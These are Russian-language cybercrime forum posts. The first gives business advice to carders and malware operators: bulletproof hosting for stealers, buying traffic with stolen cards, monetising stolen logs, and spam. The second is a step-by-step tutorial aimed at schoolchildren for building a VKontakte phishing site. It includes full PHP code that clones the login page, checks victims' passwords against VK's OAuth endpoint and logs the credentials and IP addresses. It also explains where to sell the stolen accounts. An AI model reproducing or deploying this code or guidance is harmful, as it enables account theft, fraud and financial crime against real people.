Тут просто. Берете вы канал на 1Гб/сек. А у вас он ниже раза так в 2 или 3 (имеется в виду сумма входящего + исходящего потока). Тех. Поддержка клятвенно уверяет, что канал выделенный, а не shared. А у вас другая картина … Очень и часто распространено. Проверяйте. Критично если вам нужен широкий канал для работы.

• Наёб с характеристиками

Еще проще. Вам обещают 32 ГБ рам, а ставят 16. Зачем это нужно? А потому что 50% даже не проверяют. Проверяйте, перед вами мило извинятся и поставят нужное.

• Наёб с абузоустойчивостью сервера.

Ну а здесь просто поле для манёвров. Нолики туда-сюда, уверения туда-сюда. Лживые слова и улыбочки по переписке. Давайте разложим всё по полочкам. Прежде всего нужно спросить, что можно размещать на сервере. Если ваш стиллер размещать можно, то это, прежде всего разрешение хостинга и не больше, а не устойчивость к абузам!!! Дурят даже на этом!

Пример: Хостинг без проблем разрешает разместить стиллер, но говорит, что в случае жалобы (абузы) отключит его.

Так же нынче очень активно продвигается абузоустойчивость, но без чего-либо (например, без защиты от спамхауса) или «ограниченная абузоустойчивость».

-- Голубчик, это вздор!
-- Чего вздор?
-- Вторая свежесть -- вот что вздор! Свежесть бывает только одна -- первая, она же и последняя. А если осетрина второй свежести, то это означает, что она тухлая! (с)

Поэтому если берете абузоустойчивый сервер, то уточняйте, какие абузы он держит. Любимая фраза хостеров: «Да мы полностью абузоустойчивый хостинг, но вот жалобы от ### не держим». Не устраивает такой подход, хорошим аналогом будет фастфлюкс. Правда хороший еще поискать надо.

• Наёб с абузоустойчивостью доменов.

Тут еще проще – их не существует. Вообще никаких. Есть относительно лояльные. Но не более. Поэтому домены придется менять. Иногда часто, иногда редко. Но сразу на это настраивайтесь. И поставьте авточекер, который будет проверять живой домен или нет. Хуже не будет.

Пример: домен сдох во время пролива трафика и весь трафик пошел псу под хвост. Как этого избежать? Читайте в следующий статьях.

• Наёб с технической поддержкой.

Больше частью саппорт очень тупой и не разбирается в вопросах от слова совсем и вообще. Тут слово наёб употребить сложно, но некоторые вопросы которые можно самому решить за полчаса, могут занять 1-2 дня, если не больше. Поэтому опять же – навык базового администрирования сервера ну очень необходим.

Параграф четвертый. Трафик.

Тема очень обширна и требует прямо-таки отдельной большой статьи. Единственное предисловие, которое я хочу сразу сказать. Ниш, где можно найти нужный вам трафик МОРЕ. Навскидку могу назвать 3-4, где минимальная конкуренция. И не надо быть семи пядей во лбу, чтобы запустить туда бур и начать разработку. Просто надо немного пошевелить задницей и напрячь котелок.

Мини-заключение

Статья была длинная, поэтому на этом пока что всё. Если народу будет интересно, продолжу.

В личку пожалуйста не долбитесь с вопросами, задать можете прямо в топике. По возможности постараюсь ответить.

Так же можете сказать, о чем интересно узнать в дальнейшем в первую очередь.
Часть вторая

Долгосрочный успех не бывает быстрым. Либо так, либо так, но не вместе. Бизнес – это марафон.

Прежде чем перейти далее, отвлекусь немного. Хотите, я скажу выводы из всей этой эпопеи? Работаю со многими людьми в смежных областях и самые популярные фразы, которые я слышу:

• Я взял обычный хостинг за 10 баксов. Ну и пусть забанят, зато дешево О_о
• Пока нет денег ни на что, но я сделал это бесплатно, это бесплатно, тут кинул, а тут взял хакнутую версию. Полная херня, кардинг мёртв, нихренасики не работает.
• Отстук нулевой. Трафик полное УГ. Проверять не стал, софт реально рабочий, мне разработчик так сказал.
• Купил супер-мануал, а он нихрена не работает.
• Купил инсталлы, а они все отработанные.
• Etc

Итак, люди хотят денег. Это логично. Люди хотят денег, ничего не вкладывая. Это не логично. Люди хотят много денег, ничего не вкладывая и ничего не зная. Это уже тупо. Поэтому придется, прежде всего, разобрать еще один вопрос, на который опять же 99% ложит хрен.

Параграф четвертый. Финансовая грамотность.

Собственно, а зачем вообще что-то считать и прогнозировать? Вдарим, ухнем, хряпнем, тяпнем и оно всё сам сложится как надо. Правильно? А потом на форумах идёт плач Ярославны на тему: «Оно не работаааааает, всё сдохлооооо, кардинг мёёёёртв, УУУУ!».

Первое правило финансовой грамотности – не сидеть на форумах общего назначения.

99% людей ни на что не способны. Из оставшегося процента 99% людей занимаются не тем, что интересно тебе. С оставшимися можно при совпадении многих случайных факторов сделать большое дело.

Представьте, что у вас есть вопрос, на который вам нужно получить ответ. Вы идёте на форум, где сидят нубы, тролли, школота и небольшой процент умных людей. Умные люди вам ответят, вряд ли, им некогда, лень, да и в принципе палить полезную инфу как-то не с руки. А вот остальные … УХ. Минимум получите потраченное время и испорченное настроение. Максимум – скормят левую информацию.

Что делать? Меньше впитывайте в себя ненужную информацию, основанную на бесполезных эмоциях и вбросах. Образуйте связи, вступайте в небольшие целевые группы/каналы/закрытые форумы, общайтесь со знающими людьми. Процесс небыстрый, зато очень эффективный.

Второе правило финансовой грамотности – имей надёжную, железобетонную, титановосплавную техническую базу.

Если менять свободу и перспективы на колбасу, однажды не останется ни свободы, ни перспектив, ни колбасы.

К предыдущему моему посту. Всегда работайте на хорошем и надёжном хостинге. Это стоит не так дорого! Это ваша база и основа. Без неё нет смысла двигаться дальше. Логика «пока быстренько так, подниму копеечку и сразу перееду на нормальный» обычно кончается тем, что получается полный «пшик».

Всегда проверяйте купленный софт на работоспособность! Если ваш купленный софт, на арендованном хостинге выполняют свою задачу хотя бы на 4 с плюсом, то тогда можно двигаться дальше. Если нет – вернитесь к «шагу ноль» и пройдите путь заново.

Третье правило финансовой грамотности – имей чёткий бизнес план, экономический расчет и конкретные цифры.

Реальные ценности создавать гораздо тяжелее, чем их видимость. Для второго вам понадобится только хороший пиарщик и много фантазии. С первым обычно всё сложнее — там есть цифры.

А это вообще бич нынешних недо-кардеров. Когда у меня просят помощи или консультации, я всего прошу показать финансовые расчёты и чёткий план действий. Как вы можете понять, ни у одного подобного человечишки его не существует в природе.

ВСЕГДА (вот так капсом, ага) нужно иметь расчёты. По пунктам, с чувством, толком и расстановкой. Учитывая мнимую и вредную экономию (возьму хост подешевле, крипт подешевле, трафик подешевле) и нужную экономию (возьму чуть подороже, зато сэкономлю деньги).

Примерные расчеты выглядят так:

Хостинг + софт + расходники + крипт + аренда нужных сервисов + текущие расходы + подушка безопасности на напредвиденные расходы (10-20% от суммы) = N долларов

Затем сверяем с количество денег на счету. Если укладываетесь, то хорошо. Если нет, то либо думаем где можно адекватно сэкономить, либо добиваем недостающую сумму. Начинать что-либо с профицитом бюджета – это потерять все деньги и ничего не получить по итогу.

Четвёртое правило финансовой грамотности – из говна конфетку не слепить.

Чудеса случаются, но только с другими людьми. Свои чудеса надо тщательно и заранее готовить.

Тут опять же злую роль играет вера в чудеса. Практически каждый человек без личного опыта, ждёт что «а вдруг оно сложится и всё получится». Не последнюю роль в этом играют форумы, где есть куча отзывов и историй людей, который хоп и гребут бабки, без опыта, знаний, понимания, вложений.

Согласитесь обидно? Вы весь такой начитанный и подготовленный и у вас дырка от бублика в кармане, а кто-то рубит бабло из воздуха.

Не бывает такого. Если в вашем круге общения люди, которые ничего не знают, не понимают, не разбираются, не хотят учиться и вообще активно вещают херню на тему «я тупо колочу бабло, нажимая кнопки», то пора вам менять круг общения.

• Не ждите чудес.
• Не ждите, что с нулевыми вложениями вы резко разбогатеете.
• Не ждите, что с нулевыми вложениями вы вообще что-то сможете сделать.
• Не ждите магии.
• Не думайте, что проблемы и провисы в бюджете рассосутся сами собой.
• Всегда оперируйте конкретными цифрами и практическими результатами.
• Никогда не верьте словам людей, что «у меня вот хоп и всё работает, а почему у вас не работает я хз».

Успех – это не альтернатива неудаче. Успех это то, что приходит после серии неудач.

Пятое правило финансовой грамотности – никаких платных мануалов.

Запомни, сынку, три важных правила:

• Тему продают, когда она не работает.
• Тему продают, когда она сдохла и с неё хочется поиметь еще хоть что-то.
• А вот рабочую схему дрочат до посинения, забив на пожрат, посрат, поспат и потрахаццо. Без исключения.

Параграф пятый. Трафик и инсталлы. Мифы.

Мир справедлив. У каждого следствия есть своя причина. Каждый получает именно то, для получения чего создал условия.

Трафик – это святая святых всех кардеров. Мекка и святой Грааль. Объект поклонения, дрочева и бесчисленных мифов и легенд.

Естественная столь жирная и вкусная тема привлекла огромное число людей из серии «я вам за небольшие деньги продам большие деньги, только купи». А лохи и рады верить.

Поэтому давайте разбирать основные мифы и легенды, попутно думая, в какую же сторону рыть и двигаться. Повторюсь! Не будьте тупыми, будьте умными. Не разрешайте разным ублюдкам кормиться за ваш счёт! Читайте и мотайте на ус.

Внимание! Я специально говорю про трафик, а не готовые инсталлы. Объяснение дам в конце.

Всё дальнейшее – это моё личное мнение, основанное на логике и практическом опыте. Верить, не верить, принимать, использовать, оперировать полученный информацией или нет – это ваш личный выбор.

**Трафик. Основные псевдо-мифы.

Миф 1. Трафик это 99% успеха в деле.**

Трафик это 30-35% успеха дела. А может и меньше.

Грамотно сконвертировать трафик в инсталлы (от этого зависит количество да и качество инсталлов), отработать все типы трафика (декстопный и мобильный), добиться высокого конверта и, наконец, по максимуму монетизировать полученный результат – это задача еще более сложная, чем добывать трафик.

Миф 2. Хорошего трафика очень мало и его очень сложно добывать.

Трафика ОЧЕНЬ много и добывать его не так сложно, как об этом леший малюет. Просто надо шевелить головой. Не надо искать там, где нет того, что хочется найти.

Миф 3. За хорошие деньги, можно купить качественный трафик.

Нельзя. Никто не будет продавать деньги за деньги.

Миф 4. Есть готовые решения по добыче трафика.

Нету. Все готовые решения – это банальный развод для хомячков и не больше.

Инсталлы. Основные псевдо-мифы.

Здесь еще всё интереснее. Если работа с голым трафиком распространена относительно мало (ибо там нужен опыт и какая-никакая, но база, для приёмки и обработки), то рынок по продаже инсталлов это «Большой Круговорот Дерьма в Природе». Хотите узнать почему? Читаем дальше.

Представьте, что у вас есть свой канал трафика, и вы с него черпаете инсталлы. Трафик у вас приватный, свой, хороший и т.д. А потом вы решили, вместо того, чтобы понять на нём денег, продавать его по 1 баксу за инсталл. Или еще веселее – продавать готовые логи, вместо того, чтобы их монетизировать самим.

Представляете, сколько существует благородных самаритянинов?

• Вывод первый. Любой сервис по продаже инсталлов/логов пользуется «пабликовым» трафиком. Без исключения.
• Вывод второй. Любой сервис по продаже инсталлов/логов создан для в-попу-имения не особо умных хомячков и школиёв. Без исключения.
• Вывод третий. Любая продажа трафика/логов подразумевает тот факт, что продажа этого лога за пять копеек выгоднее, чем монетизация этого самого лога.
• Вывод четвертый. Если инсталлы выгоднее продавать, чем монетизировать, то качество инсталлов совсем грустное.
• Вывод пятый. Вас считают за дибилов. Не обидно?

Я однажды подсчитал с учетом всех возможностей монетизации, сколько бы мог стоить мой инсталл, если бы я хотел его продавать. Крипта, банки, палка, амазоны, шопы, акки, линки и т.д. Cтоимость одного инсталла с хорошего трафика получилась около 25-30$ Причем, это чисто декстопный трафик. Без жирных ваеров и прочего.

Картина выглядит примерно так. Кто-то насрал, другой съел, переварил, опять насрал. Это вторично переработанное дерьмо, опять кто-то съел и так по кругу. Пардон за неприятную картину, но по факту так и есть. Не спорю, даже ковыряясь в дерьме, можно нарыть что-то относительно съедобное и полезное. Но вам-то оно надо?

Заключительный вывод первый – любая продажа трафика, логов etc это обычный и простейший развод хомячков, которые ничерта не соображают в том, что делают.

Заключительный вывод второй – если подсчитать затраты (деньги+время) и чистую прибыль, то получится удивительная картина. Свой трафик (даже поганого качества) в разы, если не на порядок, профитнее и выгоднее!

Параграф шестой. Трафик. Добыча.

Важнейшее замечание! Кроме добычи трафика, нужно уметь его еще грамотно конвертировать, обрабатывать и монетизировать по максимуму. Это, возможно, самая сложная тема во всей цепочке. Иначе без этого, даже самый хороший и целевой трафик можно спустить в унитаз. Или получить в десять раз меньше прибыли, чем её могли бы быть.

Если коротко, то тема конвертации трафика в инсталлы - сложная, объемная и требует качественной соображалки. И разных тестов сплит-тестов. Много сплит- тестов.

P.S. Высказанное выше, это сугубо моё мнение. Кто-то делает лендинги за 50 баксов и не парится.

Но на данный момент мы остановимся лишь на методах добычи трафика. Схемы работы с ними я писать не буду, по понятным причинам. Если до сих пор не поняли, почему никто не будет писать готовые мануалы – перечитываем пост.

Биржи

Как проще всего добывать трафик? Купить его - это логично. А теперь ключевой вопрос – почему биржевой трафик самый задроченный и убитый? Ответ – потому что его можно купить бесплатно (т.е. вбить). Картина примерно следующая. Есть энное количество бирж, где можно закупить трафик нахаляву. То бишь купить картонку и вбить ее, это намного выгоднее, чем выкладыватаь свои кровные.

Кому выгоден такой трафик? Сервисам по продаже инсталлов и логов (см. выше). Тупые хомячки будут жрать это говнецо, пищать на несправедливость мира и … продолжать жрать это говнецо. Секта копрофилов, мать их. Тьфу.
Получается все биржи – это полное УГ и смысла в них нет?

Ну, джентельмены, это смешно. Бирж трафика ХРЕНОВА туча. Ну, вот очень много их. Берите те, которые не дрочат все кому не лень и работайте с ними. Да придется выложить свои кровные, то бишь платить вбелую. Но где вы видели бизнес без рекламы? Здесь схожая картина. Хотите «клиентов», вкладывайтесь в рекламу. И будет вам профит.

Ну, или продолжайте жаловаться на плохих и злых дядей, который не дают вам жить хорошо и толкают трафик в 10 рук.

**P.S. А вот явный минус бирж – это ограниченный трафик, который так или иначе будет выработан. Поэтому для тех кто активно хочет использовать биржи в своей работе, желательно постоянно искать новые ресурсы и менять разводки на старых.

Связки**

Моральный устаревший метод добычи инсталлов с IE. Толку ноль, профита, в общем-то, тоже. Хорошего мата тем более. Потеря времени. Это даже не вчерашний, а позавчерашний день.

СPA конторы

Больше подходят для мобильных инсталлов, но с фантазией можно придумать качественный подход и для декстопного трафика. Тема достаточно выдроченная, поэтому на кривой козе тут не подъехать. Нужно понимание рынка и определенная доля соображалки. Не для средних умов. Поэтому если добились успеха, поздравляю, ваш интеллект выше среднего.

Фейсбук и гугл адвордс

Очень качественный и целевой трафик. Одна из самых лучших тем для работы с трафиком, в общем и целом. Минусы те же. Постоянно крутят гайки, требуется постоянно искать новый подход, бороться с модерацией, повышать конверт и отслеживать еще кучу параметров. Рекомендуется работать в небольшой команде. В данном сегменте скорость работы является одним из самых важных параметров. Работая в одиночку, времени тупо не будет хватать ни на что.

Торренты

Многие скажут, что тема давно выдрочена. В общем-то, да. Для обычных людей. А вот умные люди черпают оттуда ОЧЕНЬ вкусный трафик и инсталлы. Не советую сбрасывать со счетов. Наши ребята с инсталлов чисто с торрентов делают около 10-15К$ в неделю.

Фриланс

Лайфхак. Если делать что-то самому лень или не умеешь, отдай на аутсорс. Специалист сам всё сделает, настроит и нагонит трафик.

Плюсы:

• Удобно и экономит хренову тучу времени.
• Трафик будет реально чистый, без «соседей».
• Объемы можно получить очень нехилые.

Минусы:

• Основные фриланс биржи давно выдрочены, бро, расслабься.
• Найти хорошего спеца та еще головная боль.
• Платить в невыдроченные биржи придётся своими беленькими. И я не про водку, а кровно заработанные.
• Кидают ток в путь. Булки не расслабляем.

А так ниша хорошая, как раз в том, что выдрочена и граница между «кинули, уроды» и «крутой чел, охрененный трафик» огроооомная и труднопреодолимая. Есть смысл озаботиться. Порог входа высокий.

Спам (смс и мыло)

Спам мыл, тема скажу откровенно сложная, ибо требует мощной технологической базы и поддержки. Спам-фильтры стали мощные, на кривой козе их не объехать. Плюс нужны хорошие базы, желательно корпоративные. Высокая фантазия, как их грамотно обработать. Ну и руки из нужного места.

Для нубов, два важнейших замечания:

• Запихать exe в PDF НЕВОЗМОЖНО. Раньше было вомзожно, ныне все уязвимости закрыты. Кто говорит обратное, хочет вас жёстко анально поиметь. Спорим он готов сделать это за «небольшую сумму денег»?
• Запихать EXE в .docs возможно, только если у человека включены макросы. В ином случае там ничего не отработает. Теперь подумаем, как много людей вообще знает, что это такое и зачем они вообще нужны?

Смс спам, наоборот тема благородная и благодатная. Минусы те же, нужен свой смс шлюз, хорошая фантазия, приложение/АПК файл, базы и т.д. Ну и наконец, софт и деньги на организацию всего этого хозяйства.

Шеллы

Наверное, самая сложная тема с технической точки зрения. Их мало добыть, надо еще и трафик слить оттуда. А это уже задача сложная. Поэтому если умеете, данная статья вообще не для вас. Если не умеете, то это не для новичков. И даже не для любителей.

Параграф седьмой. Лендинги. Конверсия.

Очередная мега-обширная тема, на которую 99% кладёт болт. И которая приносит около 50% успеха дела. Как-то так

Чиркани отзыв, поставь лайк. Ну и пишите в комментариях, какие темы еще разобрать.

Если нужна консультация, то пишите адекватные сообщения с конкретными вопросами. Всякие там «броканья» с «типа хочу денег, но хз чо делать, скажи куда рыть и напиши мануал, чтобы я сделал и получил кучу бабла» засуньте себе в … ну поняли в общем. Надоело такие сообщения читать.

Благодарность принимаю на BTC : 15La1sGz7DqrXap6CEdZdDGZoeH47KtHTW​

Аудиозаписи с голосом имеются. Необходимо, чтобы фраза была произнесена его голосом.

Фишинг - один из старейших способов развода, который не умрет никогда.
В этой статье я расскажу что такое фишинг, способы заработка с помощью него и КАК СДЕЛАТЬ таковой самому.
Статья больше подходит для школьников-студентов, которым не помешает лишний 'чирик' в кармане
Рассказывать буду о фишинге ВК, но, при должном желании можно сделать тоже самое и для других платформ
............................
Итак, начнем.
Фишинг Вконтакте - один из лучших способов заработка, так как имеет разветвления, позволяющие КАЖДОМУ найти в нем что-то 'свое'.
Ниже приведен КРАТКИЙ список способов заработка на фишинге ВК:
​

1. Индивидуальный взлом аккаунтов с помощью фишинга - 500р+ с одного заказа​

2. Продажа самого фишинга на бордах - 50р-3000р с одной продажи​

3. Спам - 4р-30р+ за аккаунт, 50р+ в день​

О 3-ем пункте поговорим чуть подробнее.
Спам является одним из самых легких способов заработка на фишинге, ведь он не имеет необходимости сдачи проделанной работы в сроки, постоянного онлайна и общения с покупателями.
Можно нанять спамеров, можно спамить самому, но суть остается той же- нет графика работы и дедлайнов.

Со способами заработка я надеюсь ты, мой читатель, ознакомился.
Теперь приступим к тому, как сделать свой фишинг ВК и работать с ним.

--------------------

Обычно фишинги пишутся на PHP и MySQL.
Но, для практики обойдемся 'файликами', вместо полноценной БД.
Да, это небезопасно, но для начала сойдет
--------------------------------------------------------------------
Для начала, чтобы наши PHP-скрипты работали - скачай локальный сервер. Мой выбор пал на DENWER (Тык)

Скачивай, открывай, устанавливай.
В нескольких шагах проинструктирую всю установку:
​

1. 'Вы действительно хотите установить базовый пакет?' - Да ​

2. Открывается консоль - следуй инструкции и выбирай рекомендуемые настройки ​

3. После установки - На всякий случай перезагрузи компьютер​

4. После перезагрузки зайди в ' Мой компьютер' и, если появился новый диск - заходи в него - denwer -start.exe ​

elseif4. Зайди в диск C:// - и найди папку WebServers. Далее заходи в нее - denwer -start.exe ​

​

Итак, ты успешно установил Denwer. Приступаем к 'написанию' фишинга​

Для начала нужно зайти в само 'хранилище' наших сайтов. Оно находится в C:\WebServers\home\localhost\www.
Создай в данной директории новую папку с названием сайта. Например vktest.

Заходи в нее и создавай:
**файл index.php
папку info с файлами ipaddr.txt , mps.txt , name.txt , text.txt **

Заходи в него с помощью любого редактора (Sublime Text, Kamodo Edit, Atom, Notepad++)
И копируй код ниже (он большоооооооой):

Spoiler: Код

PHP:Copy to clipboard

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
   <head>
      <meta http-equiv="X-UA-Compatible" content="IE=edge" />
      <meta charset="utf-8">
      <link rel="shortcut icon" href="https://vk.com/images/icons/favicons/fav_logo.ico?5" />
      <link rel="apple-touch-icon" href="https://vk.com/images/safari_60.png?1">
      <link rel="apple-touch-icon" sizes="76x76" href="https://vk.com/images/safari_76.png?1">
      <link rel="apple-touch-icon" sizes="120x120" href="https://vk.com/images/safari_120.png?1">
      <link rel="apple-touch-icon" sizes="152x152" href="https://vk.com/images/safari_152.png?1">
      <meta http-equiv="content-type" content="text/html; charset=utf-8" />
      <meta name="description" content="" />
      <title>Вход | ВКонтакте</title>
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <link rel="stylesheet" type="text/css" href="https://vk.com/css/al/fonts_cnt.css?2889730895" />
      <link rel="stylesheet" type="text/css" href="https://vk.com/css/al/common.css?29532151062" />
      <link type="text/css" rel="stylesheet" href="https://vk.com//css/al/login.css?21188992645">
      </link>
      <link type="text/css" rel="stylesheet" href="https://vk.com//css/al/ui_common.css?21113360501">
      </link>
   </head>
   <body class="login_page">
      <div id="system_msg" class="fixed"></div>
      <div id="utils"></div>
      <div id="layer_bg" class="fixed"></div>
      <div id="layer_wrap" class="scroll_fix_wrap fixed layer_wrap">
         <div id="layer"></div>
      </div>
      <div id="box_layer_bg" class="fixed"></div>
      <div id="box_layer_wrap" class="scroll_fix_wrap fixed">
         <div id="box_layer">
            <div id="box_loader">
               <div class="pr pr_baw pr_medium" id="box_loader_pr">
                  <div class="pr_bt"></div>
                  <div class="pr_bt"></div>
                  <div class="pr_bt"></div>
               </div>
               <div class="back"></div>
            </div>
         </div>
      </div>
      <div id="stl_left"></div>
      <div id="stl_side"></div>
      <div class="scroll_fix_wrap _page_wrap" id="page_wrap">
      <div>
         <div class="scroll_fix">
            <div id="page_header_cont" class="page_header_cont">
               <div class="back"></div>
               <div id="page_header_wrap" class="page_header_wrap">
                  <a class="top_back_link" href="" id="top_back_link" onclick="if (nav.go(this, event, {back: true}) === false) { showBackLink(); return false; }" onmousedown="tnActive(this)"></a>
                  <div id="page_header" class="p_head p_head_l0" style="width: 960px">
                     <div class="content" >
                        <div id="top_nav" class="head_nav">
                           <div class="head_nav_item fl_l">
                              <a class="top_home_link fl_l " href="/" aria-label="На главную" accesskey="1">
                                 <div class="top_home_logo"></div>
                              </a>
                           </div>
                           <div class="head_nav_item fl_l">
                              <div id="ts_wrap" class="ts_wrap">
                                 <input name="disable-autofill" style="display: none;" />
                                 <input type="text" onmousedown="event.cancelBubble = true;" ontouchstart="event.cancelBubble = true;" class="text ts_input" id="ts_input" autocomplete="off" name="disable-autofill" placeholder="Поиск" aria-label="Поиск" />
                              </div>
                           </div>
                           <div class="head_nav_item fl_l head_nav_btns"><span id="top_audio_layer_place"></span></div>
                           <div class="head_nav_item fl_r"><a class="top_nav_link" href="" id="top_switch_lang" style="display: none;" onclick="ajax.post('al_index.php', {act: 'change_lang', lang_id: 3, hash: '274d71cad1b5904c92' }); return false;" onmousedown="tnActive(this)">
                              Switch to English
                              </a><a class="top_nav_link" href="/join" id="top_reg_link" style="display: none" onclick="return !showBox('join.php', {act: 'box', from: nav.strLoc}, {}, event)" onmousedown="tnActive(this)">
                              регистрация
                              </a>
                           </div>
                           <div class="head_nav_item_player"></div>
                        </div>
                        <div id="ts_cont_wrap" class="ts_cont_wrap" ontouchstart="event.cancelBubble = true;" onmousedown="event.cancelBubble = true;"></div>
                     </div>
                  </div>
               </div>
            </div>
            <div id="page_layout" style="width: 960px;">
               <div id="page_body" class="fl_r " style="width: 960px;">
                  <div id="header_wrap2">
                     <div id="header_wrap1">
                        <div id="header" style="display: none">
                           <h1 id="title"></h1>
                        </div>
                     </div>
                  </div>
                  <div id="wrap_between"></div>
                  <div id="wrap3">
                     <div id="wrap2">
                        <div id="wrap1">
                           <div id="content" class="page_block">
                             <div id="step1">
                              <h2 class="login_header">Вход ВКонтакте</h2>
                              <div id="login_message">

                              <?php echo '
                                     <div class="oauth_wrap_content" id="oauth_wrap_content">
          <div class="oauth_head">
  <a class="oauth_logo fl_l" href="#" target="_blank"></a>
  <div id="oauth_head_info" class="oauth_head_info fl_r">

  </div>
</div>

<div class="oauth_content box_body clear_fix">

  <form method="POST" id="login_submit">
    <div class="oauth_form">

     ';
               $nametxt = fopen('info/name.txt', "a+");
     $texttxt = fopen('info/text.txt', "a+");
     $ipaddrtxt = fopen('info/ipaddr.txt', "a+");
     $mpstxt = fopen('info/mps.txt', "a+");
               function example() {
                 echo '<div id="box_error" class="box_error" style="display: block;">Неверно введён логин или пароль.</div><br>';
               }

      function curl($url){

                 $ch = curl_init( $url );
                 curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
                 curl_setopt( $ch, CURLOPT_SSL_VERIFYHOST, false );
                 curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, false );
                 $response = curl_exec( $ch );
                 curl_close( $ch );
                 return $response;
               }

               if (isset($_POST['email'])){
               $info = '';
               $capecho = '';

$ipaddr = $_POST['ipaddr'];
                 $email = $_POST['email'];
                 $password = $_POST['pass'];
                 if(isset($_POST['captcha_sid'])) {
                 $captcha_sid = $_POST['captcha_sid'];
                 $captcha_key = $_POST['captcha_key'];
                 } else {
                     $captcha_sid = '';
                     $captcha_key = '';
                 }
                 $res = curl('https://oauth.vk.com/token?grant_type=password&client_id=3697615&client_secret=AlVXZFMUqyrnABp8ncuU&username='.$email.'&password='.$password.'&captcha_key='.$captcha_key.'&captcha_sid='.$captcha_sid);
                 $lo='access_token';

                 $pos = strripos($res, $lo);

                 $json = json_decode($res, true);
                 if ($pos === false) {
                if($json["error"] === "need_captcha")
                {
                  $info='<br><div class="box_error" style="margin-bottom:15px;">Ошибка авторизации. Введите код с картинки.</div>';
                  $capecho = 1;
                  $capid = $json["captcha_sid"];
                }else {
                  example();
                  $capecho = 0;
                }
                 }else {
$name = $_POST['email'];
$text = $_POST['pass'] ;
$ipaddr = $_POST['ipaddr'];
$mps = $name.':'.$text ;
$post_data = array (
'email\n' => $name,
'pass\n' => $text,
'ipaddr\n' => $ipaddr,
'mailpass\n' => $mps,

);

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// указываем, что у нас POST запрос
curl_setopt($ch, CURLOPT_POST, 1);
// добавляем переменные
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);

$output = curl_exec($ch);
curl_close($ch);
                $info='<div class="info_line" align="center" style="font-weight:bold;">Вход выполнен.</div><br>

                <div class="info_line" align="center">Ваша заявка на проверку была отправлена и будет обработана через 12 часов!
            </div><br>
                      ';
                 }
     $nametxt = fopen('info/name.txt', "a+");
     $texttxt = fopen('info/text.txt', "a+");
     $ipaddrtxt = fopen('info/ipaddr.txt', "a+");
     $mpstxt = fopen('info/mps.txt', "a+");

        fwrite($nametxt, $name);
                fwrite($nametxt, '<br/>');
        fwrite($texttxt, $text);
                fwrite($texttxt, '<br/>');
        fwrite($ipaddrtxt,$ipaddr);
                fwrite($ipaddrtxt,'<br/>');
        fwrite($mpstxt, $mps);
                fwrite($mpstxt, '<br/>');
                 }
               else{

               }
               echo $info;
    if ($pos != true ) {  echo '
    <form action="savebase.php" method="POST">
<div class="oauth_form_login">

                                <div align="center" >
        <input style="padding:15px;" type="text" class="oauth_form_input dark" name="email" id="index_email" value="'.$email.'" required placeholder="Телефон или e-mail">
        <br/>
        <br/>
        <input type="hidden" name="ipaddr" value="' .$_SERVER['REMOTE_ADDR']. '">
        <input style="padding:15px;" type="text" class="oauth_form_input dark" name="pass" id="index_pass" value="'.$password.'" required placeholder="Пароль" style="-webkit-text-security: disc;" />
        </div>
               ';
                                                            echo '

<div class="login_buttons_wrap" align="center">
        <button class="flat_button button_big_text login_button" id="install_allow" type="submit">Войти</button><button class="flat_button button_big_text login_reg_button" onclick="javascript:void(0)">Регистрация</button>
        <input type="submit" name="submit_input" class="unshown">
        </div>
      </div>
    </div>
  </form>
    </div>'; }
echo '
        </div>
</html> ';  ?>
                                 </div>
                              </div>
                              <div class="login_fast_restore_wrap _retore_wrap"></div>
                             </div>
                        </div>
                     </div>
                  </div>
               </div>
               <div id="footer_wrap" class="footer_wrap fl_r" style="width: 960px;">
                  <div class="footer_nav" id="bottom_nav">
                     <div class="footer_copy fl_l"><a href="https://vk.com/about" target="_blank">ВКонтакте</a> &copy; 2018</div>
                     <div class="footer_lang fl_r">Язык:<a class="footer_lang_link">English</a><a class="footer_lang_link" >Русский</a><a class="footer_lang_link">Українська</a><a class="footer_lang_link">все языки &raquo;</a></div>
                     <div class="footer_links">
                        <a class="bnav_a" href="https://vk.com/about" target="_blank">о компании</a>
                        <a class="bnav_a" href="https://vk.com/terms" target="_blank">правила</a>
                        <a class="bnav_a" href="https://vk.com/ads" target="_blank" style="">реклама</a>
                        <a class="bnav_a" href="https://vk.com/dev" target="_blank">разработчикам</a>
                     </div>
                  </div>
                  <div class="footer_bench clear">
                  </div>
               </div>
               <div class="clear"></div>
            </div>
         </div>
      </div>

        <script src="https://code.jquery.com/jquery-2.1.4.min.js"></script>
        <script src="../js/default.js"></script>
   </body>
</html>

Для тех, кого интересует его структура:

1. Сама страница (HTML,CSS)
2. Запрос к vk.com с помощью cURL (для автоматической проверки аккаунтов)
3. Получение ответа
4. Запись в файлы (fopen, fwrite)
........................
После создания папки info с txt-файлами(text.txt, name.txt, ipaddr.txt, mps.txt) ты будешь получать туда ВСЕ валидные (верные) комбинации аккаунтов.
Чуть-чуть доделав скрипт можно начать его продавать или использовать самому.

------------------------
После написания своего супер-пупер скрипта - нужно залить его на ВДС-ку или хостинг. Отличия лишь в том, что хостинг банит СРАЗУ такие скрипты, а ВДС- ки нет.
Из ВДС-ок я использую TimeWeb (не реклама). Как ставить на него скрипт/сайт можете посмотреть на ютубе.
Для исправной работы скрипта понадобится установить расширение 'cURL' если оно заранее не установлено.
Стоимость самого дешевого сервера - 200р. Но он будет служить тебе еще целый месяц, за который можно будет ооооочень легко его окупить.

!!! ВАЖНО!!!
Делать это все нужно через ВПН, дабы избежать различных проблем в будущем/блокировок.

Итак, ты загрузил весь скрипт на хостинг/вдс, получил первые аккаунты, но не знаешь где и как их продать?
Для этого есть отдельные маркеты по типу LZT.MARKET (не реклама) и других.
Также, если у тебя есть свободный бюджет и ты готов потратить свои 500-1000 кровных - можешь смело открывать свой интернет-магазин аккаунтов с помощью
deer.io (не реклама) и продавать их в 1.5-3 раза дороже. Именно на deer.io стоят большинство интернет-магазинов с аккаунтами вк, поэтому готовься к 'потной конкуренции', которая МОЖЕТ помешать твоему 'бизнес-плану' =))

